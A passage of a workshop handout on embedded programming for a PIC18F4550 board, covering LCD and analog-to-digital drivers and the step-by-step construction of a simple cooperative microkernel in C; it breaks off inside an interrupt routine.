2.3 LCD communication ..... 4
2.4 Analog reading ..... 6
3 First embedded firmware ..... 8
4 What is a kernel? ..... 9
5 Kernel components ..... 10
6 Kernel Project ..... 11
6.1 Why to develop our own kernel? ..... 11
6.2 Alternatives ..... 11
6.3 Monolithic kernel versus microkernel ..... 11
6.4 Kernel design decisions ..... 12
6.5 This course decisions ..... 12
7 Concepts ..... 13
7.1 Function pointers ..... 13
7.2 First example ..... 14
7.3 Structs ..... 15
7.4 Circular buffers ..... 15
7.5 Second Example ..... 16
7.6 Temporal conditions ..... 19
7.7 Third Example ..... 20
8 The Kernel ..... 23
9 Building the device driver controller ..... 26
9.1 Device Driver Pattern ..... 26
9.2 Controller engine ..... 26
9.3 Using the controller engine ..... 27
9.4 Interesting situations ..... 28
9.5 Driver callback ..... 29
1 Developing an embedded system
An embedded system is a system designed for a specific purpose that has a microcontroller or a
microprocessor as the central piece. The microcontroller runs software built exclusively to support the
functionalities outlined in the embedded product. In order to build an embedded system, we must account
for both hardware and software issues.
The hardware part is composed of a microcontroller and other circuits that are responsible for
interfacing the microcontroller with the user or with other microcontrollers. The document that
describes the way these components are connected is called a schematic.
In this document we’re going to build a simple board with a microcontroller and an LCD. The way each of
them must be connected depends on the component; in general, their manufacturers provide an application
note showing the default connection.
For the system we’re going to use a PIC18F4550 as the microcontroller unit, an HD44780 as the LCD output
interface and a regular potentiometer as the input.
1.1 System connections
For the required system the connections will be made as in the following schematic
This system can be connected using a protoboard as shown in the image below.
2 System programming
In order to correctly program the system, a dedicated programmer will be used. This programmer needs
some initial code to execute correctly. These directives are responsible for the initial setup of the system.
#pragma config MCLRE=ON        // Master Clear enabled
#pragma config FOSC=INTOSC_XT  // Internal oscillator
#pragma config WDT=OFF         // Watchdog disabled
#pragma config LVP=OFF         // Low voltage programming disabled
#pragma config DEBUG=OFF       // Debug mode disabled
#pragma config XINST=OFF       // Extended instruction set disabled
2.1 Making access to the hardware
All terminals are mapped in the RAM area. In order to access one terminal we first need to find the
terminal address and then make a pointer to this address. PORTD, for example, is connected at the 0xF83
address.
void main (void){
    char *ptr;
    //pointing to port D
    ptr = (char *) 0xF83;
    //driving all outputs high
    *ptr = 0xFF;
}
To make the peripheral usable, the pin direction must also be defined as input or output. This
is achieved through the TRIS register. The code below blinks all the LEDs connected to PORTD. In order to
simplify port access, a #define can be used to hide the pointer accesses.
#define PORTD (*(volatile __near unsigned char*)0xF83)
#define TRISD (*(volatile __near unsigned char*)0xF95)
void main(void) {
TRISD = 0x00;
for(;;){
PORTD ^= 0xFF;
}
}
2.2 Accessing individual bits
The register accessed is generally composed of eight bits, each one mapped to one terminal. To access
bits individually we need some binary manipulation, using bitwise operations. These operations can
be wrapped in pseudo-functions using the #define preprocessor directive:
//using define
#define BitSet(arg,bit) ((arg) |= (1<<(bit)))
#define BitClr(arg,bit) ((arg) &= ~(1<<(bit)))
#define BitFlp(arg,bit) ((arg) ^= (1<<(bit)))
#define BitTst(arg,bit) ((arg) & (1<<(bit)))
4
2.3 LCD communication
The LCD communication will be made using only 4 bits of data. This forces us to build a library which can
perform all the steps required by the LCD. The LCD data lines will be accessed using PORTD bits 4, 5, 6 and 7.
The enable and register select pins will be accessed through PORTC bits 6 and 7.
The LCD protocol requires some delays. As the delay times do not need to be precise, we can use a simple
for loop to produce them.
void delayMicroseconds(int us) {
    int i;
    for (; us > 0; us--) {
        for (i = 0; i < 30; i++);
    }
}
Another step in the communication is the data clock. This is achieved using the enable pin.
void pulseEnablePin() {
BitClr(PORTC, EN);
delayMicroseconds(1);
// send a pulse to enable
BitSet(PORTC, EN);
delayMicroseconds(1);
BitClr(PORTC, EN);
}
To send a byte, first the most significant 4 bits must be sent, then the least significant 4 bits.
void pushNibble(int value, int rs) {
PORTD = (value) << 4;
if (rs) {
BitSet(PORTC, RS);
} else {
BitClr(PORTC, RS);
}
pulseEnablePin();
}
void pushByte(int value, int rs) {
int val_lower = value & 0x0F;
int val_upper = value >> 4;
pushNibble(val_upper, rs);
pushNibble(val_lower, rs);
}
The difference between a command and a data byte is the value on the register select pin.
void lcdCommand(int value) {
pushByte(value, 0);
delayMicroseconds(40);
}
void lcdChar(char value) {
pushByte((unsigned int) value, 1);
delayMicroseconds(2);
}
The initialization requires a strict protocol of delays and different operations.
#define PORTC (*(volatile __near unsigned char*)0xF82)
#define PORTD (*(volatile __near unsigned char*)0xF83)
#define TRISC (*(volatile __near unsigned char*)0xF94)
#define TRISD (*(volatile __near unsigned char*)0xF95)
void lcdInit() {
    BitClr(TRISC, EN);
    BitClr(TRISC, RS);
    TRISD = 0x0f;
    delayMicroseconds(50);
    pushNibble(0x03, 0);
    delayMicroseconds(5);
    pushNibble(0x03, 0);
    delayMicroseconds(100);
    pushNibble(0x03, 0);
    delayMicroseconds(5);
    pushNibble(0x02, 0);
    delayMicroseconds(10);
    //configure the display
    lcdCommand(0x28); //4-bit interface, 2 lines, 5x8 font
    lcdCommand(0x06); //incremental mode
    lcdCommand(0x0c); //display and cursor on, with blink
    lcdCommand(0x03); //clear everything
    lcdCommand(0x80); //initial position
    lcdCommand(0x01); //clear display
    delayMicroseconds(2);
}
To print a regular string one must just watch for the string end ‘\0’.
void lcdString(char msg[]) {
    unsigned char i = 0; //avoids compiler warning when comparing i with strlen()'s uint8_t
    while (msg[i]) {
        lcdChar(msg[i]);
        i++;
    }
}
The LCD can build customized characters. The characters must be sent to a specific address in the LCD
internal memory.
void lcdDefconLogo(void) {
int i;
unsigned char defcon[] = {
0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x1, 0x4,
0xe, 0x1f, 0x4, 0x4, 0x1f, 0xe, 0x11, 0x1f,
0x0, 0x10, 0x18, 0x18, 0x18, 0x18, 0x10, 0x4,
0xc, 0x3, 0x0, 0x0, 0x0, 0x3, 0xc, 0x4,
0x0, 0x0, 0x1b, 0x4, 0x1b, 0x0, 0x0, 0x0,
0x6, 0x18, 0x0, 0x0, 0x0, 0x18, 0x6, 0x2
};
lcdCommand(0x40);
for (i = 0; i < 8 * 6; i++) {
lcdChar(defcon[i]);
}
}
2.4 Analog reading
Reading the analog pins requires an initial setup of the AD converter, followed by a loop to wait for
the conversion time.
#define TRISA (*(volatile __near unsigned char*)0xF92)
#define ADCON2 (*(volatile __near unsigned char*)0xFC0)
#define ADCON1 (*(volatile __near unsigned char*)0xFC1)
#define ADCON0 (*(volatile __near unsigned char*)0xFC2)
#define ADRESL (*(volatile __near unsigned char*)0xFC3)
#define ADRESH (*(volatile __near unsigned char*)0xFC4)
void adInit(void) {
BitSet(TRISA, 0); //pin setup
ADCON0 = 0b00000001; //channel select
ADCON1 = 0b00001110; //ref = source
ADCON2 = 0b10101010; //t_conv = 12 TAD
}
unsigned int adRead(void) {
unsigned int ADvalue;
BitSet(ADCON0, 1); //start conversion
while (BitTst(ADCON0, 1)); //wait
ADvalue = ADRESH; //read result
ADvalue <<= 8;
ADvalue += ADRESL;
return ADvalue;
}
To use the AD converter it only needs to be initialized first. In the example below we light the
LED whenever the value goes above a threshold.
#define PORTD (*(volatile __near unsigned char*)0xF83)
#define TRISD (*(volatile __near unsigned char*)0xF95)
void main(void) {
TRISD = 0x00;
adInit();
for(;;){
//threshold on half the scale
if(adRead()>512){
PORTD = 0xFF;
}else{
PORTD = 0x00;
}
}
}
3 First embedded firmware
void main(void) {
OSCCON = 0x73;
lcdInit();
lcdDefconLogo();
lcdCommand(0x80);
lcdChar(0);
lcdChar(1);
lcdChar(2);
lcdString(" Defcon");
lcdCommand(0xC0);
lcdChar(3);
lcdChar(4);
lcdChar(5);
lcdString("mBed workshop");
adInit();
for (;;) {
lcdCommand(0x8B);
lcdChar((adRead() / 1000) % 10 + 48);
lcdChar((adRead() / 100) % 10 + 48);
lcdChar((adRead() / 10) % 10 + 48);
lcdChar((adRead() / 1) % 10 + 48);
}
}
4 What is a kernel?
In computer science the kernel is the part of the system software responsible for implementing the interface
to, and managing, the hardware and the application. The most critical hardware resources to be managed are the
processor, the memory and the I/O drivers.
Another task that is commonly provided by the kernel is process management. This is even more
important in an embedded context, where, in general, the processes have strict time requirements.
When there is no kernel, all the responsibility for organizing the processes, whether hardware or application
processes, falls on the programmer.
5 Kernel components
In general a kernel has three main responsibilities:
1) Manage and coordinate the processes
execution using “some criteria”
The “some criteria” can be the maximum execution time, the functions' priorities, the event criticality, the
programmed execution sequence, among others. It is this criterion which distinguishes the preemptive kernel
(in which each process has a maximum time to be executed; if the time runs out the next process is started, and
when it finishes, or its time expires, the first process is resumed from the exact point where it was interrupted)
from the cooperative one (in which each process is executed until it ends, and after that the next one is called).
As the kernel is responsible for managing the processes, it should have functions that allow the inclusion of a
new process and the removal of an old one.
As each process uses, internally, some amount of memory for its variables, the kernel should handle this too.
This is the second kernel responsibility.
2) Manage the free memory and coordinate
the processes' access to it
The kernel should also be capable of informing the process when a malloc() request could not be
fulfilled.
Aside from memory, the processes may also need access to the I/O resources of the
computer/microcontroller, such as serial ports, LCD displays and keyboards, among others. The one responsible
for allowing/denying access from the processes to the hardware devices is the kernel. This is the third kernel
responsibility:
3) Intermediate the communication between the
hardware drivers and the processes
The kernel should provide an API through which the processes can safely access the information available in the
hardware, both to read and to write.
6 Kernel Project
6.1 Why to develop our own kernel?
Having your own kernel can improve in-house designs while still giving the developers full control over the
source.
With a single-loop architecture, you need to re-test almost everything every time you reuse code.
When the kernel is fully tested, there is no problem with reuse. Even the applications have a better reuse rate, as
the kernel keeps the hardware abstraction layer even if the chip is changed.
When planning to use a kernel in your new system development, always consider all the alternatives, both
paid and free.
Even if the in-house design option is chosen, start with a free project as a basis. Both OpenRTOS and BRTOS
are really small (BRTOS has only 7 code files, and only one is hardware dependent) and their licenses are more
permissive (you can close the source code). Another great source of information is the Linux kernel
(www.kernel.org). There are as many as 10k lines added daily!
6.2 Alternatives
There are lots of options for moving from a kernel-less to a kernel design. Paid solutions have some
benefits, mainly for the technical support. Below are presented some options with their descriptions.
Windows Embedded Compact® is the Windows version for small computers and embedded systems. It is
a modular real-time operating system with a kernel that can run in under 1 MB of memory. It is available for
the ARM, MIPS, SuperH and x86 processor architectures. The source code is available for modification by the
developer.
VxWorks® is a real-time operating system. It has been ported and optimized for embedded systems,
including the x86 family, MIPS, PowerPC, Freescale ColdFire, Intel i960, SPARC, SH-4 and ARM. In its smallest
option (fully static) it has a footprint of just 36k.
X RTOS®: this kernel is mainly aimed at deeply embedded systems with severe timing and computing
resource restrictions. It supports ARM and PowerPC processors.
uClinux is a derivative of the Linux kernel intended for microcontrollers without Memory Management Units
(MMUs). As an operating system it includes the Linux kernel as well as a collection of user applications, libraries and
tool chains. The kernel can be compiled to a footprint of just 2k.
FreeRTOS kernel consists of only three or four C files (there are a few assembler functions included where
needed). SafeRTOS is based on the FreeRTOS code base but has been updated, documented, tested and audited
to enable its use in IEC 61508 safety related applications.
BRTOS is a lightweight preemptive real time operating system designed for low end microcontrollers. It
supports a preemptive scheduler, semaphores, mutexes, message queues and mailboxes. It is written mostly in
C language, with little assembly code. There are ports to Coldfire V1, HCS08, RX600, MSP430, ATMEGA328/128
and Microchip PIC18. It can be compiled to just 2KB of program memory and about 100bytes of RAM.
6.3 Monolithic kernel versus microkernel
The main difference between these architectures is the amount of functionality that is implemented
inside the kernel space. By keeping a minimalistic approach, microkernels tend to use fewer CPU resources.
Because the device drivers are now in user space, microkernels tend to be less susceptible to driver
crashes. It is also easier to maintain a microkernel because of its small source code size, generally under 10,000
lines. As Jochen Liedtke stated:
“A concept is tolerated inside the microkernel only if moving it outside the kernel, i.e., permitting
competing implementations, would prevent the implementation of the system's required functionality.”
6.4 Kernel design decisions:
The designer should consider some points before starting the development of the kernel:
I/O devices management: How should the kernel implement the device interface? Inside the kernel?
Using device drivers? Will it use a separate driver controller, or will it be implicit in the kernel activities? Will direct
access (application<>driver) be possible? In which cases? In the case of hot-plug devices, how will the kernel load
the driver dynamically?
Process management: Will the kernel context switch be cooperative or preemptive? How can the processes
communicate with each other? Will a message queue be implemented? Should there be a shared memory?
How to control access to it? Will semaphores be available? Is there any need to implement a process priority
check?
System safety: Is there any hardware safety item to be used (watchdog, protected memory)? Will
hierarchical protection be used? If so, does the CPU support an MMU, or can the design go on with the slowdown
of software protection checking? Should the system try to close and restart an unresponsive process
automatically?
Decide carefully: some of these decisions cannot be changed without a complete source code rewrite,
while others can be deferred until later in the project. Bring in the hardware people to help with these definitions,
as some of the decisions are very hardware dependent.
6.5 This course decisions
In this course we will present a simple non-preemptive, cooperative microkernel, without memory
management, using a device driver controller to isolate the device drivers from the kernel. The processes will
be scheduled based on their required execution frequencies.
7 Concepts
Kernel development requires some deep knowledge of programming and hardware/software issues. Some
of these points are presented below.
7.1 Function pointers
In some situations we want our program to choose which function to execute; for example, an image
editor may apply the function Blur or the function Sharpen to some image. Declaring both functions:
image Blur(image nImg){
// Function implementation
}
image Sharpen(image nImg){
// Function implementation
}
We can build the image editor engine as:
image imageEditorEngine(image nImg, int option){
image temp;
switch(option){
case 1:
temp = Sharpen(nImg);
break;
case 2:
temp = Blur(nImg);
break;
}
return temp;
}
It is clear that we need to change the engine code whenever we add more features. In general,
changing the code means more tests and more bugs.
Another option is to make the engine a little more generic by using function pointers.
//declaration of the pointer-to-function type
typedef image (*ptrFunc)(image nImg);
//called by the image editor
image imageEditorEngine(ptrFunc function, image nImg){
image temp;
temp = (*function)(nImg);
return temp;
}
From the code we can note that the function now receives a pointer to a function as a parameter. This
way we do not need to worry about adding features; the main code will be kept intact. One of the drawbacks is
that all functions must now have the same signature, i.e., they must receive the same parameter types in
the same order, and the return variable must be of the same type.
Using the function pointer concept we can then use the Blur and Sharpen functions in an easier way:
//...
image nImage = getCameraImage();
nImage = imageEditorEngine(Blur, nImagem);
nImage = imageEditorEngine(Sharpen, nImagem);
//...
The functions are passed as if they were variables.
By essentially being a pointer, we must dereference the variable before using the function:
temp = (*function)(nImg);
We can also store the function passed as a parameter in a conventional variable. This way we can call that
function later in the program (only the pointer is stored; no code is actually copied).
The function pointer declaration syntax is somewhat complex. Normally we use a typedef to make things
clearer.
7.2 First example
In this first example we will build the main part of our kernel. It should have a way to store which
functions need to be executed and in which order. To accomplish this we will use a vector of function
pointers:
//pointer function declaration
typedef void(*ptrFunc)(void);
//process pool
static ptrFunc pool[4];
Our processes will be of ptrFunc type, i.e. they do not receive any parameters and do not return anything.
Each process will be represented by a function. Here are three examples:
static void tst1(void) { printf("Process 1\n");}
static void tst2(void) { printf("Process 2\n");}
static void tst3(void) { printf("Process 3\n");}
These processes just print their names on the console/default output.
The kernel itself has three functions: one to initialize itself, one to add a new process to the process pool,
and one to start the execution. As the kernel is supposed to never stop, we build an infinite loop inside
its execution function.
//kernel variables
static ptrFunc pool[4];
static int end;
//kernel function prototypes
static void kernelInit(void);
static void kernelAddProc(ptrFunc newFunc);
static void kernelLoop(void);
//kernel functions
static void kernelInit(void){
end = 0;
}
static void kernelAddProc(ptrFunc newFunc){
if (end <4){
pool[end] = newFunc;
end++;
}
}
static void kernelLoop(void){
int i;
for(i=0; i<end;i++){
(*pool[i])();
}
}
In this first example the kernel only executes the functions that are given to it, in the order in which they
were added. There is no other control. The process pool size is defined statically.
To use the kernel we should follow three steps: initialize the kernel, add the desired processes, and
execute the kernel.
void main(void){
kernelInit();
kernelAddProc(tst1);
kernelAddProc(tst2);
kernelAddProc(tst3);
kernelLoop();
}
7.3 Structs
Structs are composite variables. With them we can group several pieces of information and work with them as if
they were one single variable. They can be compared to vectors, except that each position can store a different
variable type. Here is an example:
typedef struct{
    unsigned short int age;
    char name[51];
    float weight;
}people; // struct declaration
void main(void){
    people myself = {26, "Rodrigo", 70.5};
    //using each variable from the struct
    printf("Age: %d\n", myself.age);
    printf("Name: %s\n", myself.name);
    printf("Weight: %f\n", myself.weight);
}
To build a functional kernel, we need to aggregate more information about each process. We will do this
through a struct. For now just the function pointer is enough; as more information is needed (such as process ID
or priority) we will add it to the process struct.
//function pointer declaration
typedef char(*ptrFunc)(void);
//process struct
typedef struct {
ptrFunc function;
} process;
We should note that now every process must return a char. We will use it as a return code indicating
success or failure.
7.4 Circular buffers
Buffers are memory spaces with the purpose of storing temporary data. Circular buffers can be
implemented using a normal vector with two indexes, one indicating the list start and the other indicating the
list end.
The main problem with this implementation is defining when the vector is full or empty, as in both cases
the start and the end index point to the same place.
There are at least 4 alternatives for resolving this problem. In order to keep the system simple we
will keep the last slot always open; in this case, if (start==end) the list is empty.
Below is an example of how to cycle through the whole vector an infinite number of times:
#define CB_SIZE 10
int circular_buffer[CB_SIZE];
int index=0;
for(;;){
//do anything with the buffer
circular_buffer[index] = index;
//increment the index
index = (index+1)%CB_SIZE;
}
To add one element to the buffer (avoiding overflow) we can implement a function like this:
#define CB_SIZE 10
int circular_buffer[CB_SIZE];
int start=0;
int end =0;
char AddBuff(int newData){
//check if there is space to add any number
if ( ((end+1)%CB_SIZE) != start){
circular_buffer[end] = newData;
end = (end+1)%CB_SIZE;
return SUCCESS;
}
return FAIL;
}
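The text only shows the producer side. A hypothetical companion GetBuff(), using the same indexes and the same keep-one-slot-free rule, could remove the oldest element like this (a sketch, not part of the original kernel):

```c
#define CB_SIZE 10
#define SUCCESS 0
#define FAIL 1

int circular_buffer[CB_SIZE];
int start = 0;
int end = 0;

/* insertion routine, as in the text */
char AddBuff(int newData){
    //check if there is space to add a new number
    if ( ((end+1)%CB_SIZE) != start){
        circular_buffer[end] = newData;
        end = (end+1)%CB_SIZE;
        return SUCCESS;
    }
    return FAIL;
}

/* hypothetical companion: removes the oldest element */
char GetBuff(int *oldData){
    //empty when both indexes meet
    if (start != end){
        *oldData = circular_buffer[start];
        start = (start+1)%CB_SIZE;
        return SUCCESS;
    }
    return FAIL;
}
```

Elements therefore come out in the same order they went in, which is exactly the behavior the process pool needs.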
7.5 Second Example
As presented, there are four important changes in this version: the process pool is now implemented as a
circular buffer; each process is now represented as a struct (for now composed only of the process function
pointer); and all functions return an error/success code.
The last change is that a process can now inform the kernel that it wants to be rescheduled. The kernel
then re-adds the process to the process pool.
//return code
#define SUCCESS 0
#define FAIL 1
#define REPEAT 2
//kernel information
#define POOL_SIZE 4
process pool[POOL_SIZE];
char start;
char end;
//kernel functions
char kernelInit(void);
char kernelAddProc(process newProc);
void kernelLoop(void);
The biggest change in kernel usage is that now we need to pass a process struct to the AddProc function
instead of only the function pointer. Note that each process function returns whether it finished successfully or
wants to be rescheduled.
char tst1(void){
printf("Process 1\n");
return REPEAT;
}
char tst2(void){
printf("Process 2\n");
return SUCCESS;
}
char tst3(void){
printf("Process 3\n");
return REPEAT;
}
void main(void){
//declaring the processes
process p1 = {tst1};
process p2 = {tst2};
process p3 = {tst3};
kernelInit();
//now is possible to test if the process was added successfully
if (kernelAddProc(p1) == SUCCESS){
printf("1st process added\n");
}
if (kernelAddProc(p2) == SUCCESS){
printf("2nd process added\n");
}
if (kernelAddProc(p3) == SUCCESS){
printf("3rd process added\n");
}
kernelLoop();
}
The kernel loop function is the one with the most changes. Now it needs to check whether the executed
function wants to be rescheduled and act as specified.
void kernelLoop(void){
int i=0;
for(;;){
//Do we have any process to execute?
if (start != end){
printf("Ite. %d, Slot. %d: ", i, start);
//execute the first function and
//check if there is need to reschedule
if ( (*(pool[start].function))() == REPEAT){
//rescheduling
kernelAddProc(pool[start]);
}
//prepare to get the next process
start = (start+1)%POOL_SIZE;
//just for debug
i++;
}
}
}
The AddProc() function has to check that there are at least two free slots in the buffer (remember that
the last position is required to be free at all times) and then insert the process.
char kernelAddProc(process newProc){
//checking for free space
if ( ((end+1)%POOL_SIZE) != start){
pool[end] = newProc;
end = (end+1)%POOL_SIZE;
return SUCCESS;
}
return FAIL;
}
The initialization routine only sets the start and end variables to the first position:
char kernelInit(void){
start = 0;
end = 0;
return SUCCESS;
}
Here is the output of the main program for the first 10 iterations:
-----------------------------
1st process added
2nd process added
3rd process added
Ite. 0, Slot. 0: Process 1
Ite. 1, Slot. 1: Process 2
Ite. 2, Slot. 2: Process 3
Ite. 3, Slot. 3: Process 1
Ite. 4, Slot. 0: Process 3
Ite. 5, Slot. 1: Process 1
Ite. 6, Slot. 2: Process 3
Ite. 7, Slot. 3: Process 1
Ite. 8, Slot. 0: Process 3
Ite. 9, Slot. 1: Process 1
...
-----------------------------
Note that only processes 1 and 3 are repeating, as expected. Note also that the pool is cycling through slots
0, 1, 2 and 3 naturally. To the user the process pool seems “infinite”, as long as there are no more functions than
slots.
7.6 Temporal conditions
In most embedded systems we need to guarantee that a function will be executed at a
certain frequency. Some systems may even fail if these deadlines are not met.
There are at least 3 conditions that need to be satisfied in order to implement temporal conditions in the
kernel:
1. There must be a tick event that occurs with a precise frequency.
2. The kernel must be informed of the execution frequency needed by each process.
3. The sum of the process durations must “fit” within the available processor time.
The first condition can be easily satisfied if there is an available internal timer that can generate an
interrupt. This is true for the overwhelming majority of microcontrollers. There is no need for a dedicated
interrupt routine.
For the second condition we just need to add the desired information to the process struct. We added two
integers: the first indicates the period at which the function should be recalled (if it returns the REPEAT code);
the second is an internal variable in which the kernel stores the remaining time before calling the function.
//process struct
typedef struct {
ptrFunc function;
int period;
int start;
} process;
The third condition depends entirely on the system itself. Suppose a system in which the function
UpdateDisplays() needs to be called at a 5 ms interval. If this function's execution time is greater than 5 ms, it is
impossible to guarantee its execution interval. Another point worth considering is the type of context
switcher: preemptive or cooperative. On a cooperative system, a process must finish its execution
before another one can run on the CPU. On a preemptive system, the kernel can stop one process' execution
anywhere to execute another process. If a system does not “fit” in the available time, there are three options:
switch to a faster processor, optimize the execution time of the processes, or redesign the processes'
frequency needs.
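The "fit" condition can be checked off-line with a simple utilization sum: the total of execution time divided by period, over all processes, must not exceed 1. The sketch below is illustrative and not part of the kernel; the timing struct and its numbers are assumptions:

```c
/* worst-case execution time and period of one process, in microseconds */
typedef struct {
    unsigned exec_us;
    unsigned period_us;
} timing;

/* returns 1 when the set "fits": the summed utilization does not exceed 100% */
int fits(const timing *t, int n){
    double load = 0.0;
    int i;
    for (i = 0; i < n; i++)
        load += (double)t[i].exec_us / (double)t[i].period_us;
    return load <= 1.0;
}
```

For a cooperative kernel this is only a necessary condition, since a long-running process can still delay the others past their deadlines.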
When implementing the time conditions a problem may arise. Suppose two processes P1 and P2. The first
is scheduled to happen 10 seconds from now and the second 50 seconds from now. The timer we are using is
16 bits unsigned (values from 0 to 65,535), counting in milliseconds, and it is now marking 45.5 seconds
(now_ms = 45,535).
We can see from the picture that the process P2 was correctly scheduled, as P2.start = now_ms + 50,000 =
30,000. The now_ms variable will be incremented until 55,535, when the process P1 will be started (with the
correct delay of 10 seconds). The variable now_ms will continue until 65,535 and then return to zero.
When the overflow happens, exactly 20 seconds have passed from the start (65,535 - 45,535 = 20,000 ms).
P2 required 50 seconds of delay, so it is necessary to wait 30 more seconds before it can be called, which is
exactly what will happen when now_ms gets to 30,000.
The problem with using a finite number to measure time may arise when two processes should be called
within a small space of time, or even simultaneously.
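The wrap-around described above is handled naturally when deadlines are compared with unsigned modular subtraction, as long as no delay exceeds half the counter range. This is a side sketch, not part of the kernel's code:

```c
#include <stdint.h>

/* with unsigned 16-bit arithmetic the subtraction wraps exactly like the
   timer does, so the result is the remaining time regardless of overflow */
static uint16_t remaining(uint16_t now_ms, uint16_t deadline_ms){
    return (uint16_t)(deadline_ms - now_ms);
}
```

Using the text's numbers: the deadline 45,535 + 50,000 wraps to 29,999, yet the remaining time computed this way is still 50,000 ms.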
Suppose that now P1 and P2 are scheduled to happen exactly at now_ms = 30,000. If P1 is called first and
takes 10 seconds to execute, we will have the following time-line:
The question now is: from the time-line above (which is the only information the kernel has), should the
process P2 already have been executed (and wasn't), or was it scheduled to happen 50,535 ms from now?
In order to solve this problem there are two options:
1. Create a flag for each process indicating that the timer counter has already passed it. This
way we can know whether a process behind the counter is late or has been scheduled to happen ahead.
2. Create a counter that is decremented at each kernel clock tick. The process is executed when its counter arrives at zero.
The second option introduces more overhead, as we need to decrement all the processes' counters. On the
other hand, if we allow the counter to assume negative values (as it is decremented) we can see for how
long the process has been waiting. With this information we can do something to avoid starvation. One option is
to create a priority system and promote a process if it stays too long without being executed.
7.7 Third Example
This time we're adding the time component to the kernel. Each process has a field called start which is
decremented as time passes by. When it becomes zero (or negative) we call the function.
The ExecuteKernel() function is responsible for finding the process that is closest to being executed, based on
its start counter. It is necessary to go through the whole pool to make this search. When the next process to be
executed is found, we swap its position with the first one in the pool. After that we just spend time waiting for the
process to be ready to execute.
This apparently useless time is needed to synchronize all the events, and is a good opportunity to put the
system into low power mode.
void ExecuteKernel(void){
    unsigned char j;
    unsigned char next;
    process tempProc;
    for(;;){
        if (start != end){
            //finding the process with the smallest start counter
            j = (start+1)%SLOT_SIZE;
            next = start;
            while(j!=end){
                //does the next one have a smaller time?
                if (pool[j].start < pool[next].start){
                    next = j;
                }
                //get the next one in the circular buffer
                j = (j+1)%SLOT_SIZE;
            }
            //exchanging positions in the pool
            tempProc = pool[next];
            pool[next] = pool[start];
            pool[start] = tempProc;
            while(pool[start].start>0){
                //great place to use low power mode
            }
            //checking if it needs to be repeated
            if ( (*(pool[start].function))() == REPEAT ){
                AddProc(pool[start]);
            }
            //next process
            start = (start+1)%SLOT_SIZE;
        }
    }
}
Now the interrupt routine. It must decrement the start field of all the processes.
void interrupt_service_routine(void) interrupt 1{
    unsigned char i;
    i = start;
    while(i!=end){
        if((pool[i].start)>(MIN_INT)){
            pool[i].start--;
        }
        i = (i+1)%SLOT_SIZE;
    }
}
The AddProc() function is responsible for initializing the process struct fields with adequate
values.
char AddProc(process newProc){
//checking for free space
if ( ((end+1)%SLOT_SIZE) != start){
pool[end] = newProc;
//increment start timer with period
pool[end].start += newProc.period;
end = (end+1)%SLOT_SIZE;
return SUCCESS;
}
return FAIL;
}
Instead of resetting the start counter we add the period to it. This is done because, while the function
runs, its counter keeps being decremented. If a function needs to be executed at a 5 ms interval and spends 1 ms
executing, when it finishes we want to reschedule it to execute 4 ms ahead (5 ms of period + (-1 ms) negative start
counter) and not 5 ms ahead.
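In numbers, the reschedule arithmetic can be captured by a tiny illustrative helper (not kernel code; the function name is an assumption):

```c
/* next value of the start counter when a run finishes.
   counter_at_finish is the (possibly negative) counter at completion time */
int nextStart(int counter_at_finish, int period){
    return counter_at_finish + period;
}
```

With a 5 ms period and 1 ms of execution time the counter reaches -1, so the next start lands 4 ms ahead, preserving the 5 ms cadence instead of drifting by the execution time.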
Void pointers
When designing the device driver controller we should build a “call distribution center”. This center will
receive an order from the application, via the kernel, and redirect it to the right device driver. The problem arises
when we think about how many parameters the function should receive: one representing which driver is required,
another indicating which function of that driver should be called, and an unknown amount of parameters
that need to be passed to the driver. How do we build such a function?
It can be done with a pointer to void.
char *name = "Paulo";
double weight = 87.5;
unsigned int children = 3;
void print(int option, void *parameter){
    switch(option){
    case 0:
        printf("%s",*((char**)parameter));
        break;
    case 1:
        printf("%f",*((double*)parameter));
        break;
    case 2:
        printf("%u",*((unsigned int*)parameter));
        break;
    }
}
void main (void){
    print(0, &name);
    print(1, &weight);
    print(2, &children);
}
From the above example we can see how to receive different types using the same function.
8 The Kernel
This is the full kernel presented in the earlier steps. In order to make it run on the development board we
rely on auxiliary libraries: one to work with interrupts (int.c and int.h), one to operate the timer
(timer.c and timer.h), one to configure the microcontroller fuses (config.h) and another with the special
registers information (basico.h).
//CONFIG.H
//microcontroler fuses configuration
code char at 0x300000 CONFIG1L = 0x01; // No prescaler used
code char at 0x300001 CONFIG1H = 0x0C; // HS: High Speed Cristal
code char at 0x300003 CONFIG2H = 0x00; // Disabled-Controlled by SWDTEN bit
code char at 0x300006 CONFIG4L = 0x00; // Disabled low voltage programming
//INT.H
void InicializaInterrupt(void);       //interrupt initialization
//TIMER.H
char FimTimer(void);                  //has the timer expired?
void AguardaTimer(void);              //wait for the timer
void ResetaTimer(unsigned int tempo); //reload the timer
void InicializaTimer(void);           //timer initialization
//BASICO.H (only part of it)
#define SUCCESS 0
#define FAIL 1
#define REPEAT 2
//bit functions
#define BitFlp(arg,bit) ((arg) ^= (1<<bit))
//special register information
#define PORTD (*(volatile __near unsigned char*)0xF83)
#define TRISC (*(volatile __near unsigned char*)0xF94)
In order to work with time requirements we need to perform some operations at fixed intervals of time,
mainly decrementing the process start counters. These steps were grouped together in one function: kernelClock().
The user just needs to call this function from their own timer interrupt function.
void kernelClock(void){
    unsigned char i;
    i = start;
    while(i!=end){
        if((pool[i].start)>(MIN_INT)){
            pool[i].start--;
        }
        i = (i+1)%SLOT_SIZE;
    }
}
The other kernel functions stay the same as presented.
char kernelAddProc(process newProc){
//checking for free space
if ( ((end+1)%SLOT_SIZE) != start){
pool[end] = newProc;
//increment start timer with period
pool[end].start += newProc.period;
end = (end+1)%SLOT_SIZE;
return SUCCESS;
}
return FAIL;
}
char kernelInit(void){
start = 0;
end = 0;
return SUCCESS;
}
void kernelLoop(void){
    unsigned char j;
    unsigned char next;
    process tempProc;
    for(;;){
        if (start != end){
            //finding the process with the smallest start counter
            j = (start+1)%SLOT_SIZE;
            next = start;
            while(j!=end){
                //does the next one have a smaller time?
                if (pool[j].start < pool[next].start){
                    next = j;
                }
                //get the next one in the circular buffer
                j = (j+1)%SLOT_SIZE;
            }
            //exchanging positions in the pool
            tempProc = pool[next];
            pool[next] = pool[start];
            pool[start] = tempProc;
            while(pool[start].start>0){
                //great place to use low power mode
            }
            //checking if it needs to be repeated
            if ( (*(pool[start].function))() == REPEAT ){
                kernelAddProc(pool[start]);
            }
            //next process
            start = (start+1)%SLOT_SIZE;
        }
    }
}
To declare the interrupt function for the SDCC compiler we just need to add “interrupt 1” after the
function name. As mentioned, it just resets the timer and calls kernelClock().
//Interrupt
void isr1(void) interrupt 1{
